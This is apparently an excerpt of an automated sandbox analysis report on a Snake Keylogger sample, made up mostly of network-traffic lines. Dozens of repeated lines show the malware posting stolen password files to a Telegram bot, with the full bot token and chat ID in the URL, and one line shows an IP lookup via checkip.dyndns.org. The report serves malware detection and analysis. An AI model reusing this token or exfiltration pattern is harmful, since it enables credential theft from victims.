                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da57571a4c0e67Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da57571a87aa22Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da57571ac5a604Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da57571b03a336Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da57571b3f3da5Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da57571b7d4400Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da57571bb8d6a7Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da57571befac4eHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da57571c2b47eeHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da57571c6947c9Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da57571ca7423bHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da57571ce2db9dHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da57571d19b236Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da57571d554d65Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da57571d8c298dHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da575719153ffdHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da57571950daa0Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5757198a1331Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da575719c5ae32Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da57571a014885Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da57571a3ce36eHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da57571a787e1fHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da57571ab1b686Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da57571aed5200Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da57571b3739f6Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da57571b7072c5Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da57571ba9ab98Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da57571be54603Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da57571c1e7e82Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da57571c5a18ccHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da57571c935407Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da57571ccc8980Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da57571d082464Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da57571d43c05bHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da57571d7cf778Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da57571dd52e6fHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da57571e10c94eHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da57571e4a018cHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da57571e833a3aHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da57571ebc7253Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da57571ef80d03Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da57571f314595Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da57571f6a7df8Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da57571fa618cfHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da57571fdf51faHost: api.telegram.orgContent-Length: 504
                Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49986
                Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49985
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49984
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49983
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49982
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49980
                Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50131 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50154 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50211 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50234 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50177 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49979
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49978
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49977
                Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49976
                Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49975
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49974
                Source: unknownNetwork traffic detected: HTTP traffic on port 50085 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49973
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49972
                Source: unknownNetwork traffic detected: HTTP traffic on port 50039 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49970
                Source: unknownNetwork traffic detected: HTTP traffic on port 50165 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49967 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50222 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50074 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50004 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49943 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49969
                Source: unknownNetwork traffic detected: HTTP traffic on port 49978 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49968
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49967
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49966
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49965
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49964
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49962
                Source: unknownNetwork traffic detected: HTTP traffic on port 50015 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50040 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49966 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50130 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50108 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50028 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49957
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49956
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49955
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49954
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49953
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49952
                Source: unknownNetwork traffic detected: HTTP traffic on port 50119 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49951
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49950
                Source: unknownNetwork traffic detected: HTTP traffic on port 50142 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49944 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50051 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50153 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49955 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49949
                Source: unknownNetwork traffic detected: HTTP traffic on port 50210 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50235 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49948
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49947
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49946
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49945
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49944
                Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49943
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
                Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
                Source: unknownNetwork traffic detected: HTTP traffic on port 49945 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
                Source: unknownNetwork traffic detected: HTTP traffic on port 50017 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
                Source: unknownNetwork traffic detected: HTTP traffic on port 49968 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50221 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50026 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49980 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49898
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
                Source: unknownNetwork traffic detected: HTTP traffic on port 50144 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49895
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49893
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
                Source: unknownNetwork traffic detected: HTTP traffic on port 50209 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50247 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50095 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49911 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49957 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50155 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
                Source: unknownNetwork traffic detected: HTTP traffic on port 50084 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
                Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50166 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50143 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49881
                Source: unknownNetwork traffic detected: HTTP traffic on port 50208 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50050 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49956 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50005 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50236 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49979 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49999
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49998
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49997
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49996
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49995
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49993
                Source: unknownNetwork traffic detected: HTTP traffic on port 50016 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49992
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
                Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50188 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
